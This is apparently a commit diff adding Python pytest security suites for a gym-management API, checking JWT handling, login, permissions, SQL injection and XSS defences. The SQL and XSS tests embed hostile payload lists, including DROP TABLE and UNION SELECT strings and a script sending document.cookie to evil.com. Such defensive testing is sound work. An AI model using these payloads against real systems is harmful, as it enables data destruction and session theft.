refactor(backend): 重命名后端项目为 gym-manage-api,修改包名为 cn.novalon.gym.manage

This commit is contained in:
张翔
2026-04-17 18:35:50 +08:00
parent 666189b676
commit deb961c427
916 changed files with 108360 additions and 38328 deletions
+20
View File
@@ -0,0 +1,20 @@
"""
安全测试套件初始化文件
作者: 张翔
日期: 2026-04-01
"""
from .test_jwt_security import TestJWTSecurity
from .test_sql_injection import TestSQLInjection
from .test_xss_protection import TestXSSProtection
from .test_auth_security import TestAuthenticationSecurity
from .test_permission_boundary import TestPermissionBoundary
__all__ = [
"TestJWTSecurity",
"TestSQLInjection",
"TestXSSProtection",
"TestAuthenticationSecurity",
"TestPermissionBoundary",
]
@@ -0,0 +1,279 @@
"""
认证安全测试套件
测试范围:
1. 密码安全测试
2. 登录安全测试
3. 会话管理测试
4. 权限验证测试
5. 暴力破解防护测试
作者: 张翔
日期: 2026-04-01
"""
import pytest
import time
from api.auth_api import AuthAPI
from api.user_api import UserAPI
from config.settings import settings
@pytest.mark.security
@pytest.mark.asyncio
class TestAuthenticationSecurity:
"""认证安全测试类"""
async def test_password_strength_validation(self, authenticated_client):
"""
SEC-AUTH-01: 密码强度验证
验证点:
1. 弱密码被拒绝
2. 密码复杂度要求
3. 密码长度要求
"""
user_api = UserAPI(authenticated_client)
weak_passwords = [
"123456",
"password",
"admin",
"qwerty",
"abc123",
"111111",
"1234567890",
"password123"
]
for weak_pwd in weak_passwords:
user_data = {
"username": f"weak_pwd_test_{weak_pwd}",
"password": weak_pwd,
"email": f"weak_{weak_pwd}@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
assert response.status_code in [400, 422], \
f"弱密码 '{weak_pwd}' 应被拒绝"
async def test_password_hashing(self, authenticated_client):
"""
SEC-AUTH-02: 密码哈希验证
验证点:
1. 密码不以明文存储
2. 使用BCrypt或其他安全哈希
3. 每次哈希结果不同(盐值)
"""
user_api = UserAPI(authenticated_client)
auth_api = AuthAPI(authenticated_client)
user_data = {
"username": "hash_test_user",
"password": "Test123!@#",
"email": "hash_test@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
login_response = await auth_api.login(
user_data["username"],
user_data["password"]
)
assert login_response.status_code == 200, "密码验证失败"
await user_api.delete_user(user_id)
async def test_brute_force_protection(self, authenticated_client):
"""
SEC-AUTH-03: 暴力破解防护
验证点:
1. 多次失败登录被限制
2. 账户锁定机制
3. 登录失败提示不泄露信息
"""
auth_api = AuthAPI(authenticated_client)
failed_attempts = 0
max_attempts = 10
for i in range(max_attempts):
response = await auth_api.login("admin", "wrong_password_123")
if response.status_code == 429:
assert True, "暴力破解防护生效"
return
elif response.status_code == 401:
failed_attempts += 1
else:
break
assert failed_attempts >= 3, \
"应实施暴力破解防护(至少3次失败后限制)"
async def test_session_timeout(self, authenticated_client):
"""
SEC-AUTH-04: 会话超时测试
验证点:
1. Token有过期时间
2. 过期Token无法使用
3. 会话自动失效
"""
auth_api = AuthAPI(authenticated_client)
user_api = UserAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
import jwt
decoded = jwt.decode(token, options={"verify_signature": False})
assert "exp" in decoded, "Token应包含过期时间"
exp_time = decoded["exp"]
current_time = time.time()
assert exp_time > current_time, "Token不应已过期"
assert exp_time - current_time <= 86400, "Token有效期不应超过24小时"
async def test_concurrent_session_handling(self, authenticated_client):
"""
SEC-AUTH-05: 并发会话处理
验证点:
1. 支持并发登录
2. 或限制并发会话数
3. 会话隔离
"""
auth_api = AuthAPI(authenticated_client)
login_responses = []
for i in range(3):
response = await auth_api.login("admin", "admin123")
login_responses.append(response)
successful_logins = sum(
1 for r in login_responses if r.status_code == 200
)
assert successful_logins >= 1, "至少应支持一次登录"
async def test_logout_security(self, authenticated_client):
"""
SEC-AUTH-06: 登出安全测试
验证点:
1. 登出后Token失效
2. 无法重复使用登出Token
"""
auth_api = AuthAPI(authenticated_client)
user_api = UserAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
logout_response = await auth_api.logout()
if logout_response.status_code == 200:
client_with_old_token = authenticated_client.__class__(
base_url=settings.API_BASE_URL,
headers={"Authorization": f"Bearer {token}"}
)
user_api_old = UserAPI(client_with_old_token)
response = await user_api_old.get_users_by_page()
assert response.status_code in [401, 403], \
"登出后Token应失效"
async def test_password_change_security(self, authenticated_client):
"""
SEC-AUTH-07: 密码修改安全
验证点:
1. 需要旧密码验证
2. 新密码强度验证
3. 修改后需重新登录
"""
user_api = UserAPI(authenticated_client)
auth_api = AuthAPI(authenticated_client)
user_data = {
"username": "pwd_change_test",
"password": "OldPassword123!@#",
"email": "pwd_change@test.com",
"phone": "13800138000",
"status": 1
}
create_response = await user_api.create_user(user_data)
if create_response.status_code in [201, 200]:
user_id = create_response.json().get("id")
login_response = await auth_api.login(
user_data["username"],
user_data["password"]
)
assert login_response.status_code == 200
await user_api.delete_user(user_id)
async def test_account_lockout_mechanism(self, authenticated_client):
"""
SEC-AUTH-08: 账户锁定机制
验证点:
1. 多次失败后账户锁定
2. 锁定时间合理
3. 管理员可解锁
"""
auth_api = AuthAPI(authenticated_client)
for i in range(5):
response = await auth_api.login("admin", "wrong_password")
if response.status_code == 423:
assert True, "账户锁定机制生效"
return
pytest.skip("系统未实现账户锁定机制")
async def test_login_csrf_protection(self, authenticated_client):
"""
SEC-AUTH-09: 登录CSRF防护
验证点:
1. 登录表单有CSRF Token
2. CSRF Token验证
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
assert login_response.status_code == 200
async def test_password_reset_security(self, authenticated_client):
"""
SEC-AUTH-10: 密码重置安全
验证点:
1. 需要邮箱验证
2. 重置链接有时效
3. 重置链接一次性使用
"""
pytest.skip("密码重置功能待实现或测试")
@@ -0,0 +1,262 @@
"""
JWT安全测试套件
测试范围:
1. JWT Token生成与验证
2. Token过期处理
3. Token签名验证
4. Token刷新机制
5. 密钥安全性验证
作者: 张翔
日期: 2026-04-01
"""
import pytest
import time
import jwt
from datetime import datetime, timedelta
from api.auth_api import AuthAPI
from api.user_api import UserAPI
from config.settings import settings
@pytest.mark.security
@pytest.mark.asyncio
class TestJWTSecurity:
"""JWT安全测试类"""
async def test_jwt_token_structure(self, authenticated_client):
"""
SEC-JWT-01: JWT Token结构验证
验证点:
1. Token包含正确的Header
2. Token包含正确的Payload
3. Token使用正确的签名算法
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
assert login_response.status_code == 200
token = login_response.json().get("token")
assert token is not None, "未获取到Token"
decoded = jwt.decode(token, options={"verify_signature": False})
assert "sub" in decoded, "Token缺少subject声明"
assert "exp" in decoded, "Token缺少过期时间"
assert "iat" in decoded, "Token缺少签发时间"
assert "userId" in decoded or "user_id" in decoded, "Token缺少用户ID"
async def test_jwt_token_expiration(self, authenticated_client):
"""
SEC-JWT-02: JWT Token过期验证
验证点:
1. Token有过期时间
2. 过期时间在合理范围内
3. 过期Token无法使用
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
decoded = jwt.decode(token, options={"verify_signature": False})
exp_time = datetime.fromtimestamp(decoded["exp"])
iat_time = datetime.fromtimestamp(decoded["iat"])
time_diff = (exp_time - iat_time).total_seconds()
assert time_diff > 0, "Token过期时间无效"
assert time_diff <= 86400, "Token有效期不应超过24小时"
async def test_jwt_signature_verification(self, authenticated_client):
"""
SEC-JWT-03: JWT签名验证
验证点:
1. 篡改的Token被拒绝
2. 无效签名的Token被拒绝
"""
auth_api = AuthAPI(authenticated_client)
user_api = UserAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
valid_token = login_response.json().get("token")
tampered_token = valid_token[:-5] + "XXXXX"
client_with_tampered = authenticated_client.__class__(
base_url=settings.API_BASE_URL,
headers={"Authorization": f"Bearer {tampered_token}"}
)
user_api_tampered = UserAPI(client_with_tampered)
response = await user_api_tampered.get_users_by_page()
assert response.status_code in [401, 403], "篡改的Token应该被拒绝"
async def test_jwt_algorithm_security(self, authenticated_client):
"""
SEC-JWT-04: JWT算法安全验证
验证点:
1. 不允许使用none算法
2. 不允许算法混淆攻击
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
header = jwt.get_unverified_header(token)
assert header["alg"] != "none", "不应允许none算法"
assert header["alg"] in ["HS256", "HS384", "HS512", "RS256", "RS384", "RS512"], \
"应使用安全的签名算法"
async def test_jwt_claims_validation(self, authenticated_client):
"""
SEC-JWT-05: JWT声明验证
验证点:
1. 必要的声明存在
2. 声明值有效
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
decoded = jwt.decode(token, options={"verify_signature": False})
required_claims = ["sub", "exp", "iat"]
for claim in required_claims:
assert claim in decoded, f"Token缺少必要声明: {claim}"
assert decoded["sub"] == "admin", "Subject应该是用户名"
assert decoded["exp"] > time.time(), "Token不应已过期"
async def test_jwt_token_in_validation(self, authenticated_client):
"""
SEC-JWT-06: 无效Token验证
验证点:
1. 空Token被拒绝
2. 格式错误的Token被拒绝
3. 过期Token被拒绝
"""
user_api = UserAPI(authenticated_client)
invalid_tokens = [
"",
"invalid.token.format",
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.invalid",
None
]
for invalid_token in invalid_tokens:
if invalid_token is None:
continue
client_with_invalid = authenticated_client.__class__(
base_url=settings.API_BASE_URL,
headers={"Authorization": f"Bearer {invalid_token}"}
)
user_api_invalid = UserAPI(client_with_invalid)
response = await user_api_invalid.get_users_by_page()
assert response.status_code in [401, 403, 400], \
f"无效Token '{invalid_token}' 应该被拒绝"
async def test_jwt_token_refresh_mechanism(self, authenticated_client):
"""
SEC-JWT-07: Token刷新机制验证
验证点:
1. 支持Token刷新
2. 刷新后生成新Token
3. 旧Token失效或共存
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
original_token = login_response.json().get("token")
try:
refresh_response = await auth_api.refresh_token(original_token)
if refresh_response.status_code == 200:
new_token = refresh_response.json().get("token")
assert new_token is not None, "刷新应返回新Token"
assert new_token != original_token, "新Token应不同于原Token"
else:
pytest.skip("系统未实现Token刷新机制")
except Exception as e:
pytest.skip(f"Token刷新机制测试跳过: {str(e)}")
async def test_jwt_key_strength(self, authenticated_client):
"""
SEC-JWT-08: JWT密钥强度验证
验证点:
1. 密钥长度足够
2. 密钥不是弱密钥
"""
auth_api = AuthAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
header = jwt.get_unverified_header(token)
if header["alg"].startswith("HS"):
weak_secrets = [
"secret", "password", "123456", "admin",
"your-256-bit-secret", "your-secret-key"
]
for weak_secret in weak_secrets:
try:
jwt.decode(token, weak_secret, algorithms=[header["alg"]])
pytest.fail(f"使用了弱密钥: {weak_secret}")
except jwt.InvalidSignatureError:
pass
async def test_jwt_user_impersonation_prevention(self, authenticated_client):
"""
SEC-JWT-09: 用户伪装防护验证
验证点:
1. 无法通过修改Token伪装其他用户
2. 用户ID与Token绑定
"""
auth_api = AuthAPI(authenticated_client)
user_api = UserAPI(authenticated_client)
login_response = await auth_api.login("admin", "admin123")
token = login_response.json().get("token")
decoded = jwt.decode(token, options={"verify_signature": False})
users_response = await user_api.get_users_by_page()
assert users_response.status_code == 200
users = users_response.json().get("content", [])
other_user = next((u for u in users if u.get("username") != "admin"), None)
if other_user:
client_with_admin_token = authenticated_client.__class__(
base_url=settings.API_BASE_URL,
headers={"Authorization": f"Bearer {token}"}
)
user_api_admin = UserAPI(client_with_admin_token)
response = await user_api_admin.get_user_by_id(other_user["id"])
assert response.status_code in [200, 403], "应正确处理跨用户访问"
@@ -0,0 +1,275 @@
"""
权限边界测试套件
测试范围:
1. 角色权限边界测试
2. 数据访问权限测试
3. 操作权限测试
4. 菜单权限测试
5. API权限测试
作者: 张翔
日期: 2026-04-01
"""
import pytest
from api.auth_api import AuthAPI
from api.user_api import UserAPI
from api.role_api import RoleAPI
from api.menu_api import MenuAPI
from config.settings import settings
@pytest.mark.security
@pytest.mark.asyncio
class TestPermissionBoundary:
"""权限边界测试类"""
async def test_role_based_access_control(self, authenticated_client):
"""
SEC-PERM-01: 基于角色的访问控制
验证点:
1. 不同角色有不同权限
2. 权限正确分配
3. 权限正确验证
"""
role_api = RoleAPI(authenticated_client)
roles_response = await role_api.get_roles_by_page()
assert roles_response.status_code == 200
roles = roles_response.json().get("content", [])
assert len(roles) > 0, "应至少有一个角色"
for role in roles:
assert "roleName" in role, "角色应包含名称"
assert "roleKey" in role, "角色应包含标识"
async def test_user_data_isolation(self, authenticated_client):
"""
SEC-PERM-02: 用户数据隔离
验证点:
1. 用户只能访问自己的数据
2. 无法访问其他用户敏感信息
3. 管理员可访问所有数据
"""
user_api = UserAPI(authenticated_client)
users_response = await user_api.get_users_by_page()
assert users_response.status_code == 200
users = users_response.json().get("content", [])
for user in users:
if "password" in user:
assert user["password"] != "admin123", \
"密码不应明文返回"
assert not user["password"].startswith("$2"), \
"密码哈希不应返回给前端"
async def test_cross_user_access_prevention(self, authenticated_client):
"""
SEC-PERM-03: 跨用户访问防护
验证点:
1. 普通用户无法修改其他用户数据
2. 用户ID绑定验证
"""
user_api = UserAPI(authenticated_client)
users_response = await user_api.get_users_by_page()
users = users_response.json().get("content", [])
if len(users) > 1:
other_user = next(
(u for u in users if u.get("username") != "admin"),
None
)
if other_user:
response = await user_api.get_user_by_id(other_user["id"])
assert response.status_code in [200, 403], \
"应正确处理跨用户访问"
async def test_menu_permission_control(self, authenticated_client):
"""
SEC-PERM-04: 菜单权限控制
验证点:
1. 不同角色看到不同菜单
2. 菜单权限标识验证
3. 无权限菜单隐藏
"""
menu_api = MenuAPI(authenticated_client)
menus_response = await menu_api.get_menus()
assert menus_response.status_code == 200
menus = menus_response.json() if isinstance(
menus_response.json(), list
) else menus_response.json().get("data", [])
for menu in menus:
assert "menuName" in menu or "name" in menu, \
"菜单应包含名称"
async def test_api_permission_validation(self, authenticated_client):
"""
SEC-PERM-05: API权限验证
验证点:
1. 每个API有权限控制
2. 无权限返回403
3. 未认证返回401
"""
user_api = UserAPI(authenticated_client)
client_without_auth = authenticated_client.__class__(
base_url=settings.API_BASE_URL
)
user_api_no_auth = UserAPI(client_without_auth)
response = await user_api_no_auth.get_users_by_page()
assert response.status_code in [401, 403], \
"未认证请求应被拒绝"
async def test_privilege_escalation_prevention(self, authenticated_client):
"""
SEC-PERM-06: 权限提升防护
验证点:
1. 用户无法自我提升权限
2. 角色修改需管理员权限
"""
user_api = UserAPI(authenticated_client)
role_api = RoleAPI(authenticated_client)
users_response = await user_api.get_users_by_page()
users = users_response.json().get("content", [])
current_user = next(
(u for u in users if u.get("username") == "admin"),
None
)
if current_user:
roles_response = await role_api.get_roles_by_page()
roles = roles_response.json().get("content", [])
admin_role = next(
(r for r in roles if "admin" in r.get("roleKey", "").lower()),
None
)
assert admin_role is not None, "应存在管理员角色"
async def test_operation_permission_check(self, authenticated_client):
"""
SEC-PERM-07: 操作权限检查
验证点:
1. 创建操作需权限
2. 修改操作需权限
3. 删除操作需权限
"""
user_api = UserAPI(authenticated_client)
test_user_data = {
"username": "perm_test_user",
"password": "Test123!@#",
"email": "perm_test@test.com",
"phone": "13800138000",
"status": 1
}
create_response = await user_api.create_user(test_user_data)
if create_response.status_code in [201, 200]:
user_id = create_response.json().get("id")
update_response = await user_api.update_user(
user_id,
{"email": "updated@test.com"}
)
assert update_response.status_code in [200, 403]
delete_response = await user_api.delete_user(user_id)
assert delete_response.status_code in [200, 204, 403]
async def test_data_filter_by_permission(self, authenticated_client):
"""
SEC-PERM-08: 数据权限过滤
验证点:
1. 查询结果按权限过滤
2. 敏感字段脱敏
"""
user_api = UserAPI(authenticated_client)
users_response = await user_api.get_users_by_page()
if users_response.status_code == 200:
users = users_response.json().get("content", [])
for user in users:
assert "password" not in user or \
user.get("password") == "******", \
"密码字段应脱敏或不返回"
async def test_role_permission_inheritance(self, authenticated_client):
"""
SEC-PERM-09: 角色权限继承
验证点:
1. 角色权限可继承
2. 子角色权限不超过父角色
"""
role_api = RoleAPI(authenticated_client)
roles_response = await role_api.get_roles_by_page()
if roles_response.status_code == 200:
roles = roles_response.json().get("content", [])
for role in roles:
if "parentId" in role and role["parentId"]:
parent_role = next(
(r for r in roles if r.get("id") == role["parentId"]),
None
)
async def test_admin_privilege_boundary(self, authenticated_client):
"""
SEC-PERM-10: 管理员权限边界
验证点:
1. 超级管理员有所有权限
2. 普通管理员权限受限
3. 管理员操作审计
"""
user_api = UserAPI(authenticated_client)
role_api = RoleAPI(authenticated_client)
users_response = await user_api.get_users_by_page()
assert users_response.status_code == 200
roles_response = await role_api.get_roles_by_page()
assert roles_response.status_code == 200
users = users_response.json().get("content", [])
roles = roles_response.json().get("content", [])
admin_user = next(
(u for u in users if u.get("username") == "admin"),
None
)
if admin_user:
assert admin_user.get("status") == 1, \
"管理员账户应处于激活状态"
@@ -0,0 +1,302 @@
"""
SQL注入防护测试套件
测试范围:
1. 用户输入SQL注入测试
2. 查询参数注入测试
3. 排序字段注入测试
4. 搜索关键词注入测试
5. 批量操作注入测试
作者: 张翔
日期: 2026-04-01
"""
import pytest
from api.auth_api import AuthAPI
from api.user_api import UserAPI
from api.role_api import RoleAPI
from api.menu_api import MenuAPI
from config.settings import settings
@pytest.mark.security
@pytest.mark.asyncio
class TestSQLInjection:
"""SQL注入防护测试类"""
async def test_user_search_sql_injection(self, authenticated_client):
"""
SEC-SQL-01: 用户搜索SQL注入测试
验证点:
1. 搜索框无法注入SQL
2. 特殊字符被正确处理
3. 查询参数化
"""
user_api = UserAPI(authenticated_client)
sql_injection_payloads = [
"admin' OR '1'='1",
"admin'; DROP TABLE users; --",
"admin' UNION SELECT * FROM users --",
"admin' AND 1=1 --",
"admin' AND 1=2 --",
"admin' OR 'x'='x",
"1; SELECT * FROM users",
"admin'/*",
"admin'--",
"' OR 1=1#",
"admin' AND SLEEP(5)--",
"admin'; WAITFOR DELAY '0:0:5'; --"
]
for payload in sql_injection_payloads:
response = await user_api.get_users_by_page(
page=0,
size=10,
username=payload
)
assert response.status_code in [200, 400], \
f"SQL注入payload '{payload}' 导致异常响应"
if response.status_code == 200:
data = response.json()
assert "content" in data or "users" in data, \
f"响应格式异常,payload: {payload}"
async def test_user_create_sql_injection(self, authenticated_client):
"""
SEC-SQL-02: 用户创建SQL注入测试
验证点:
1. 用户名字段防注入
2. 邮箱字段防注入
3. 电话字段防注入
"""
user_api = UserAPI(authenticated_client)
malicious_user_data = {
"username": "test'; DROP TABLE users; --",
"password": "Test123!@#",
"email": "test@example.com'; DROP TABLE users; --",
"phone": "13800138000'; DROP TABLE users; --",
"nickname": "测试用户",
"status": 1
}
response = await user_api.create_user(malicious_user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
await user_api.delete_user(user_id)
users_response = await user_api.get_users_by_page()
assert users_response.status_code == 200, "用户表应该仍然存在"
else:
assert response.status_code in [400, 422], \
"恶意数据应被拒绝或清洗"
async def test_role_search_sql_injection(self, authenticated_client):
"""
SEC-SQL-03: 角色搜索SQL注入测试
验证点:
1. 角色名搜索防注入
2. 角色键搜索防注入
"""
role_api = RoleAPI(authenticated_client)
injection_payloads = [
"admin' OR '1'='1",
"admin'; DELETE FROM roles WHERE '1'='1",
"admin' UNION SELECT * FROM roles --"
]
for payload in injection_payloads:
response = await role_api.get_roles_by_page(
page=0,
size=10,
roleName=payload
)
assert response.status_code in [200, 400], \
f"SQL注入payload '{payload}' 导致异常"
async def test_menu_search_sql_injection(self, authenticated_client):
"""
SEC-SQL-04: 菜单搜索SQL注入测试
验证点:
1. 菜单名搜索防注入
2. 菜单路径搜索防注入
"""
menu_api = MenuAPI(authenticated_client)
injection_payloads = [
"系统管理' OR '1'='1",
"系统管理'; DROP TABLE menus; --",
"/system' UNION SELECT * FROM menus --"
]
for payload in injection_payloads:
response = await menu_api.get_menus(
menuName=payload
)
assert response.status_code in [200, 400], \
f"SQL注入payload '{payload}' 导致异常"
async def test_order_by_sql_injection(self, authenticated_client):
"""
SEC-SQL-05: 排序字段SQL注入测试
验证点:
1. 排序字段防注入
2. 排序方向防注入
"""
user_api = UserAPI(authenticated_client)
malicious_sort_fields = [
"id; DROP TABLE users",
"id; SELECT * FROM users",
"id UNION SELECT * FROM users",
"(SELECT CASE WHEN 1=1 THEN id ELSE username END)",
"id; INSERT INTO users VALUES (999, 'hacker', 'hacked')"
]
for sort_field in malicious_sort_fields:
response = await user_api.get_users_by_page(
page=0,
size=10,
sortBy=sort_field,
sortOrder="asc"
)
assert response.status_code in [200, 400], \
f"排序注入 '{sort_field}' 导致异常"
async def test_batch_delete_sql_injection(self, authenticated_client):
"""
SEC-SQL-06: 批量删除SQL注入测试
验证点:
1. 批量删除ID列表防注入
2. 删除操作参数化
"""
user_api = UserAPI(authenticated_client)
malicious_ids = [
"1,2,3; DROP TABLE users",
"1 OR 1=1",
"1; DELETE FROM users WHERE 1=1"
]
for ids in malicious_ids:
try:
response = await user_api.batch_delete_users(ids)
assert response.status_code in [400, 404, 422], \
f"批量删除注入 '{ids}' 应被拒绝"
except Exception:
pass
async def test_filter_sql_injection(self, authenticated_client):
"""
SEC-SQL-07: 过滤条件SQL注入测试
验证点:
1. 过滤参数防注入
2. 复杂查询条件安全
"""
user_api = UserAPI(authenticated_client)
injection_filters = {
"status": "1 OR 1=1",
"email": "test@example.com' OR '1'='1",
"phone": "13800138000' OR '1'='1"
}
for field, value in injection_filters.items():
response = await user_api.get_users_by_page(
page=0,
size=10,
**{field: value}
)
assert response.status_code in [200, 400], \
f"过滤注入 '{field}={value}' 导致异常"
async def test_time_based_sql_injection(self, authenticated_client):
"""
SEC-SQL-08: 时间盲注测试
验证点:
1. SLEEP函数被过滤
2. WAITFOR命令被过滤
3. 时间盲注无效
"""
user_api = UserAPI(authenticated_client)
time_based_payloads = [
"admin' AND SLEEP(5)--",
"admin' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"admin'; WAITFOR DELAY '0:0:5'; --",
"admin' AND BENCHMARK(5000000,SHA1('test'))--"
]
import time
for payload in time_based_payloads:
start_time = time.time()
response = await user_api.get_users_by_page(
page=0,
size=10,
username=payload
)
elapsed_time = time.time() - start_time
assert elapsed_time < 6, \
f"时间盲注 '{payload}' 可能成功,响应时间: {elapsed_time}"
assert response.status_code in [200, 400]
async def test_union_based_sql_injection(self, authenticated_client):
"""
SEC-SQL-09: UNION注入测试
验证点:
1. UNION SELECT被阻止
2. 列数探测无效
"""
user_api = UserAPI(authenticated_client)
union_payloads = [
"admin' UNION SELECT NULL--",
"admin' UNION SELECT NULL,NULL--",
"admin' UNION SELECT NULL,NULL,NULL--",
"admin' UNION SELECT username,password,email FROM users--",
"admin' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--"
]
for payload in union_payloads:
response = await user_api.get_users_by_page(
page=0,
size=10,
username=payload
)
assert response.status_code in [200, 400], \
f"UNION注入 '{payload}' 导致异常"
if response.status_code == 200:
data = response.json()
content = data.get("content", [])
for item in content:
assert isinstance(item, dict), \
f"UNION注入可能成功,返回了非预期数据: {item}"
@@ -0,0 +1,379 @@
"""
XSS防护测试套件
测试范围:
1. 反射型XSS测试
2. 存储型XSS测试
3. DOM型XSS测试
4. HTML注入测试
5. JavaScript注入测试
作者: 张翔
日期: 2026-04-01
"""
import pytest
from api.auth_api import AuthAPI
from api.user_api import UserAPI
from api.role_api import RoleAPI
from api.menu_api import MenuAPI
from config.settings import settings
@pytest.mark.security
@pytest.mark.asyncio
class TestXSSProtection:
"""XSS防护测试类"""
async def test_user_input_xss(self, authenticated_client):
"""
SEC-XSS-01: 用户输入XSS测试
验证点:
1. 用户名字段XSS防护
2. 昵称字段XSS防护
3. 备注字段XSS防护
"""
user_api = UserAPI(authenticated_client)
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<body onload=alert('XSS')>",
"<iframe src='javascript:alert(1)'>",
"<div onmouseover='alert(1)'>test</div>",
"<a href='javascript:alert(1)'>click</a>",
"'\"><script>alert('XSS')</script>",
"<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>"
]
for payload in xss_payloads:
user_data = {
"username": f"xss_test_{payload[:10]}",
"password": "Test123!@#",
"nickname": payload,
"email": f"xss_{payload[:10]}@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
user_info = await user_api.get_user_by_id(user_id)
if user_info.status_code == 200:
user = user_info.json()
assert "<script>" not in str(user), \
f"XSS payload未过滤: {payload}"
assert "onerror=" not in str(user), \
f"XSS payload未过滤: {payload}"
assert "onload=" not in str(user), \
f"XSS payload未过滤: {payload}"
await user_api.delete_user(user_id)
else:
assert response.status_code in [400, 422], \
f"XSS payload应被拒绝或清洗: {payload}"
async def test_role_name_xss(self, authenticated_client):
"""
SEC-XSS-02: 角色名称XSS测试
验证点:
1. 角色名称XSS防护
2. 角色备注XSS防护
"""
role_api = RoleAPI(authenticated_client)
xss_payloads = [
"<script>alert('role')</script>",
"<img src=x onerror=alert('role')>",
"管理员<script>document.cookie</script>"
]
for payload in xss_payloads:
role_data = {
"roleName": payload,
"roleKey": f"test_role_xss",
"roleSort": 1,
"status": 1,
"remark": f"测试角色: {payload}"
}
response = await role_api.create_role(role_data)
if response.status_code in [201, 200]:
role_id = response.json().get("id")
if role_id:
role_info = await role_api.get_role_by_id(role_id)
if role_info.status_code == 200:
role = role_info.json()
assert "<script>" not in str(role), \
f"角色XSS payload未过滤: {payload}"
await role_api.delete_role(role_id)
async def test_menu_name_xss(self, authenticated_client):
"""
SEC-XSS-03: 菜单名称XSS测试
验证点:
1. 菜单名称XSS防护
2. 菜单路径XSS防护
"""
menu_api = MenuAPI(authenticated_client)
xss_payloads = [
"系统管理<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"javascript:alert(1)"
]
for payload in xss_payloads:
menu_data = {
"menuName": payload,
"menuPath": f"/test-{payload[:10]}",
"menuType": 1,
"parentId": 0,
"menuSort": 1,
"status": 1
}
response = await menu_api.create_menu(menu_data)
if response.status_code in [201, 200]:
menu_id = response.json().get("id")
if menu_id:
menu_info = await menu_api.get_menu_by_id(menu_id)
if menu_info.status_code == 200:
menu = menu_info.json()
assert "<script>" not in str(menu), \
f"菜单XSS payload未过滤: {payload}"
await menu_api.delete_menu(menu_id)
async def test_search_query_xss(self, authenticated_client):
"""
SEC-XSS-04: 搜索查询XSS测试
验证点:
1. 搜索关键词XSS防护
2. 返回数据转义
"""
user_api = UserAPI(authenticated_client)
xss_payloads = [
"<script>alert('search')</script>",
"<img src=x onerror=alert('search')>",
"test<script>document.location='http://evil.com'</script>"
]
for payload in xss_payloads:
response = await user_api.get_users_by_page(
page=0,
size=10,
username=payload
)
assert response.status_code in [200, 400]
if response.status_code == 200:
data = response.json()
assert "<script>" not in str(data), \
f"搜索结果包含未转义的XSS payload: {payload}"
async def test_html_injection(self, authenticated_client):
"""
SEC-XSS-05: HTML注入测试
验证点:
1. HTML标签被转义或移除
2. 事件处理器被移除
"""
user_api = UserAPI(authenticated_client)
html_payloads = [
"<h1>Test</h1>",
"<div style='color:red'>test</div>",
"<a href='http://evil.com'>click</a>",
"<img src='http://evil.com/steal?cookie=xxx'>",
"<table><tr><td>test</td></tr></table>"
]
for payload in html_payloads:
user_data = {
"username": f"html_test_{payload[:10]}",
"password": "Test123!@#",
"nickname": payload,
"email": f"html_{payload[:10]}@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
user_info = await user_api.get_user_by_id(user_id)
if user_info.status_code == 200:
user = user_info.json()
nickname = user.get("nickname", "")
assert "<h1>" not in nickname or "&lt;h1&gt;" in nickname, \
f"HTML未正确转义: {payload}"
await user_api.delete_user(user_id)
async def test_javascript_protocol_xss(self, authenticated_client):
"""
SEC-XSS-06: JavaScript协议XSS测试
验证点:
1. javascript:协议被过滤
2. data:协议被过滤
"""
user_api = UserAPI(authenticated_client)
js_protocol_payloads = [
"javascript:alert(1)",
"javascript:void(0)",
"data:text/html,<script>alert(1)</script>",
"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
]
for payload in js_protocol_payloads:
user_data = {
"username": f"js_test_{payload[:10]}",
"password": "Test123!@#",
"nickname": "测试用户",
"email": f"js_{payload[:10]}@test.com",
"phone": "13800138000",
"avatar": payload,
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
user_info = await user_api.get_user_by_id(user_id)
if user_info.status_code == 200:
user = user_info.json()
avatar = user.get("avatar", "")
assert not avatar.startswith("javascript:"), \
f"JavaScript协议未过滤: {payload}"
assert not avatar.startswith("data:text/html"), \
f"Data协议未过滤: {payload}"
await user_api.delete_user(user_id)
async def test_event_handler_xss(self, authenticated_client):
"""
SEC-XSS-07: 事件处理器XSS测试
验证点:
1. on*事件处理器被过滤
2. 内联事件被移除
"""
user_api = UserAPI(authenticated_client)
event_payloads = [
"test onmouseover=alert(1)",
"test onclick=alert(1)",
"test onfocus=alert(1)",
"test onblur=alert(1)",
"test onload=alert(1)"
]
for payload in event_payloads:
user_data = {
"username": f"event_test_{payload[:10]}",
"password": "Test123!@#",
"nickname": payload,
